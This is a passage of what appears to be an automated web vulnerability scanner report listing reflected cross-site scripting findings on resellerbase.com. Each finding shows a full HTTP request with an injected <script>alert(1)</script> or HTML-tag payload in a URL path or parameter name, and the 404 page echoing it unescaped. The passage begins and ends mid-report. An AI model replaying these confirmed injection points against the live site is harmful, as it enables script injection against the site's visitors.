HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/search.php?keyword=search...&Submit3=Search1a5d0<a>5a11755d175&opt=2 was not found on this server.</p>
...[SNIP]...

2.4080. http://www.resellerbase.com/resources-information/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ead14<a>f5938147bec was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/search.php?keyword=search...ead14<a>f5938147bec&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/search.php?keyword=search...ead14<a>f5938147bec&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4081. http://www.resellerbase.com/resources-information/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 39db5<script>alert(1)</script>056a870adde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/search.php?keyword=search...&Submit3=Search&opt=2&39db5<script>alert(1)</script>056a870adde=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/search.php?keyword=search...&Submit3=Search&opt=2&39db5<script>alert(1)</script>056a870adde=1 was not found on this server.</p>
...[SNIP]...

2.4082. http://www.resellerbase.com/resources-information/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 87343<a>b863a3b5c8b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/search.php?keyword=search...&Submit3=Search&opt=287343<a>b863a3b5c8b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/search.php?keyword=search...&Submit3=Search&opt=287343<a>b863a3b5c8b was not found on this server.</p>
...[SNIP]...

2.4083. http://www.resellerbase.com/resources-information/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1537b<script>alert(1)</script>1cdb5fdb77e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information1537b<script>alert(1)</script>1cdb5fdb77e/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information1537b<script>alert(1)</script>1cdb5fdb77e/themes/ was not found on this server.</p>
...[SNIP]...

2.4084. http://www.resellerbase.com/resources-information/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e59f<script>alert(1)</script>6ca6825b1fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes1e59f<script>alert(1)</script>6ca6825b1fe/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes1e59f<script>alert(1)</script>6ca6825b1fe/ was not found on this server.</p>
...[SNIP]...

2.4085. http://www.resellerbase.com/resources-information/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 146ef<script>alert(1)</script>e60e84b4a7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/?146ef<script>alert(1)</script>e60e84b4a7d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/?146ef<script>alert(1)</script>e60e84b4a7d=1 was not found on this server.</p>
...[SNIP]...

2.4086. http://www.resellerbase.com/resources-information/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 86bbf<script>alert(1)</script>69093353b30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information86bbf<script>alert(1)</script>69093353b30/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information86bbf<script>alert(1)</script>69093353b30/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4087. http://www.resellerbase.com/resources-information/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9cd14<script>alert(1)</script>25ec8083983 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes9cd14<script>alert(1)</script>25ec8083983/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes9cd14<script>alert(1)</script>25ec8083983/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4088. http://www.resellerbase.com/resources-information/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7c0ad<script>alert(1)</script>b743fdfb47c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos7c0ad<script>alert(1)</script>b743fdfb47c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos7c0ad<script>alert(1)</script>b743fdfb47c/ was not found on this server.</p>
...[SNIP]...

2.4089. http://www.resellerbase.com/resources-information/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a44a1<script>alert(1)</script>c0f036356c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/?a44a1<script>alert(1)</script>c0f036356c6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/?a44a1<script>alert(1)</script>c0f036356c6=1 was not found on this server.</p>
...[SNIP]...

2.4090. http://www.resellerbase.com/resources-information/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1ddb<script>alert(1)</script>1eab7e179e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-informationc1ddb<script>alert(1)</script>1eab7e179e6/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-informationc1ddb<script>alert(1)</script>1eab7e179e6/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4091. http://www.resellerbase.com/resources-information/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6f99<script>alert(1)</script>5587d337148 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themese6f99<script>alert(1)</script>5587d337148/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themese6f99<script>alert(1)</script>5587d337148/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4092. http://www.resellerbase.com/resources-information/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d3c64<script>alert(1)</script>eb4f82158bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmosd3c64<script>alert(1)</script>eb4f82158bb/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmosd3c64<script>alert(1)</script>eb4f82158bb/images/ was not found on this server.</p>
...[SNIP]...

2.4093. http://www.resellerbase.com/resources-information/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 21f9f<script>alert(1)</script>fac969a4747 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/images21f9f<script>alert(1)</script>fac969a4747/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images21f9f<script>alert(1)</script>fac969a4747/ was not found on this server.</p>
...[SNIP]...

2.4094. http://www.resellerbase.com/resources-information/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload db27a<script>alert(1)</script>70724dfe793 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/images/?db27a<script>alert(1)</script>70724dfe793=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/?db27a<script>alert(1)</script>70724dfe793=1 was not found on this server.</p>
...[SNIP]...

2.4095. http://www.resellerbase.com/resources-information/themes/kosmos/images/folder.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f5123<script>alert(1)</script>d5c3a2d348a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-informationf5123<script>alert(1)</script>d5c3a2d348a/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-informationf5123<script>alert(1)</script>d5c3a2d348a/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.4096. http://www.resellerbase.com/resources-information/themes/kosmos/images/folder.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec06d<script>alert(1)</script>78f5c1c020c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themesec06d<script>alert(1)</script>78f5c1c020c/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themesec06d<script>alert(1)</script>78f5c1c020c/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.4097. http://www.resellerbase.com/resources-information/themes/kosmos/images/folder.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 790d4<script>alert(1)</script>b6315045e6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos790d4<script>alert(1)</script>b6315045e6d/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos790d4<script>alert(1)</script>b6315045e6d/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.4098. http://www.resellerbase.com/resources-information/themes/kosmos/images/folder.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9c02c<script>alert(1)</script>971a1d37e1a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/images9c02c<script>alert(1)</script>971a1d37e1a/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images9c02c<script>alert(1)</script>971a1d37e1a/folder.gif was not found on this server.</p>
...[SNIP]...

2.4099. http://www.resellerbase.com/resources-information/themes/kosmos/images/folder.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
